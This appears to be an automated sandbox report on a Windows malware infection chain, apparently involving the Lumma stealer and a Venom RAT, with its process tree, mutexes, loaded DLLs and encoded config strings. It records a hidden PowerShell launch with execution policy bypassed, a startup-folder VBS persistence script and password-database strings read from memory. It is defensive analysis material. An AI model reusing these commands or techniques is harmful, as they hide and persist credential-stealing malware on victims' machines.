                  Source: 43.2.vm.exe.28c0000.1.raw.unpack, Settings.csBase64 encoded string: 'uv876R64GyPQROS6Pcq+tT2rujm6QhOA2jKz3+72iK0vssZ7tRu9W1NfcaQ5yk3K4leNInPIlyvrm/sWNe6YUSzW9MnjujJ8wA3fVO6kqY4=', 'tBbcnyqIuxWvE/Aa008Phm66l0gx08l3V72N0uezc1BvWV+aVFh/K2LjDSmziiX4d1we58iQkTKHp5hlA6J3ArDNNUTcH31I6D+8IIWmVEXPfFcr7grctRvtFWbh8/WW', 'vlrU2ttL4QCN9XP+miA1iO2Zi1Qo5KKeTfPUgLmvXsgl1b/ZXBNeN/RykY5FXUbGAFb/hcKmdGI2lxq9dyDNOg==', 'jajjt4fLdfeySHLjOUN+WU7vKFN/tv6flHwdN63QqNLvwdiPerPjqi8pJYhlDxutlcONhE6KmVeSyHLXzp1X0ivMLOia3ounzEFu+OufC35pSXOr0AgnutA9Hm2WMXLR5SrKu9Ep2d9bPbB7jBc3VXBVjkPHm+BjMjy64M6HAubGgc8bZ4x9RmkpsgBYOzwKBmFDp7rKGTxhnrnem674/IV8HtJhbUivlbelAfQbN92NlB/IZHSII0WCgZyWHfjXPeAh7ScQvm1glooPfQyjEFujB5EgoLg8/Q+UZ9OyLZY=', '/3HMGRMO5mfkdekqR4Zafv717iumQMzpVLF6A9pHRaBxVKyvDxb55/QnfojY3GM4MZFgEKqs9lZExa/oUaQFQQ==', 'l439UHfThXI7Tvv4tLPkRk4LgJxneAQ3SRt6rij4oIvNCNJh0dGkWYtmoBCaQASy+UxakX8pDIHBYYo6I0jgiA==', 'H36CdwWLE8twm6SaEVP4wCqEXttEdFNm1/TG0CIbxJ6QscVZsS9u+iDyyURaAEJfbnGnfKxPezH51YuRdKUEGw==', 'X+lWHHhlIbk/ipVH2n6hOx1tpa9s2D5Jo0CwgGIgu5WBtb6gmcLOKhvfywa/wW2BsaqNON/3eZUEUOX0Z6TMoQ=='
                  Source: 43.2.vm.exe.28c0000.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 43.2.vm.exe.28c0000.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 753F.exe.14.dr, PowerShellLoader.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 753F.exe.14.dr, PowerShellLoader.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 37.2.vm.exe.4e40000.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 37.2.vm.exe.4e40000.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@53/68@18/17
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 5_2_00BA119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,5_2_00BA119F
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 17_2_00EE119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,17_2_00EE119F
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B93F5B0 LookupPrivilegeValueA,AdjustTokenPrivileges,OpenProcessToken,24_2_00007FF70B93F5B0
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_006E0D11 CreateToolhelp32Snapshot,Module32First,4_2_006E0D11
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02ED9C80 CoCreateInstance,31_2_02ED9C80
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k1[1].rarJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeMutant created: \Sessions\1\BaseNamedObjects\8yUscnjrUY
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3656:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3076:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3852:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7864
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeMutant created: \Sessions\1\BaseNamedObjects\aqswvfsywrpgi
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7516
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5776
                  Source: C:\Users\user\Desktop\7Y18r(14).exeFile created: C:\Users\user\AppData\Local\Temp\IXDaI.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeFile opened: C:\Windows\system32\04f50d5bfbb517b12eaa2523a3e51b5ee0f9a4a9a5400f8ac09b57829b5bcf80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7760095b.bat" "
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                  Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(14).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: lm.exe, 00000026.00000003.2666645630.0000000003162000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2668070369.0000000003149000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2638557734.000000000315C000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2645191230.000000000313D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: 7Y18r(14).exeReversingLabs: Detection: 94%
                  Source: B552.exeString found in binary or memory: &github.com/filecoin-project/go-address
                  Source: B552.exeString found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
                  Source: B552.exeString found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
                  Source: B552.exeString found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
                  Source: B552.exeString found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
                  Source: unknownProcess created: C:\Users\user\Desktop\7Y18r(14).exe "C:\Users\user\Desktop\7Y18r(14).exe"
                  Source: C:\Users\user\Desktop\7Y18r(14).exeProcess created: C:\Users\user\AppData\Local\Temp\IXDaI.exe C:\Users\user\AppData\Local\Temp\IXDaI.exe
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7516 -s 1536
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\ftejced C:\Users\user\AppData\Roaming\ftejced
                  Source: C:\Users\user\AppData\Roaming\ftejcedProcess created: C:\Users\user\AppData\Local\Temp\IXDaI.exe C:\Users\user\AppData\Local\Temp\IXDaI.exe
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7760095b.bat" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F6D9.exe C:\Users\user\AppData\Local\Temp\F6D9.exe
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B552.exe C:\Users\user\AppData\Local\Temp\B552.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\753F.exe C:\Users\user\AppData\Local\Temp\753F.exe
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess created: C:\Users\user\AppData\Local\Temp\753F.exe "C:\Users\user\AppData\Local\Temp\753F.exe" -HOSTRUNAS
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 1124
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7864 -s 628
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F6D9.exe "C:\Users\user\AppData\Local\Temp\F6D9.exe"
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\7Y18r(14).exeProcess created: C:\Users\user\AppData\Local\Temp\IXDaI.exe C:\Users\user\AppData\Local\Temp\IXDaI.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F6D9.exe C:\Users\user\AppData\Local\Temp\F6D9.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B552.exe C:\Users\user\AppData\Local\Temp\B552.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\753F.exe C:\Users\user\AppData\Local\Temp\753F.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" Jump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F6D9.exe "C:\Users\user\AppData\Local\Temp\F6D9.exe" Jump to behavior
                  Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ftejcedProcess created: C:\Users\user\AppData\Local\Temp\IXDaI.exe C:\Users\user\AppData\Local\Temp\IXDaI.exe
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7760095b.bat" "
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess created: C:\Users\user\AppData\Local\Temp\753F.exe "C:\Users\user\AppData\Local\Temp\753F.exe" -HOSTRUNAS
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
                  Source: C:\Users\user\Desktop\7Y18r(14).exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(14).exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(14).exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(14).exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: ntvdm64.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wpnapps.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wpnapps.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.userer.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ftejcedSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\ftejcedSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\ftejcedSection loaded: msimg32.dll
                  Source: C:\Users\user\AppData\Roaming\ftejcedSection loaded: msvcr100.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: ntvdm64.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: ntvdm64.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: ntvdm64.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: ntvdm64.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: ntvdm64.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: msisip.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: wshext.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: appxsip.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: opcservices.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeSection loaded: rasman.dll
